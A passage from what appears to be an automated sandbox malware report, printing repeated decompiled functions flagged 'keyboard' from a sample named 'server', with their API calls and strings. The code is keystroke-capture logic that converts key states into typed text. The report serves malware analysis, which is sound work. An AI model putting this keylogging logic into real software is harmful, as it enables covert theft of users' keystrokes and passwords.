				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c859f4
0x00c859fb
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C858E4, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C858E4(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc860a0);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c858e4
0x00c858eb
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C858B1, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C858B1(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc86088);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c858b1
0x00c858b8
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C8594A, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8594A(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc860d0);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c8594a
0x00c85951
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85939, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85939(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc860c8);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85939
0x00c85940
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C858C2, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C858C2(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc86090);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
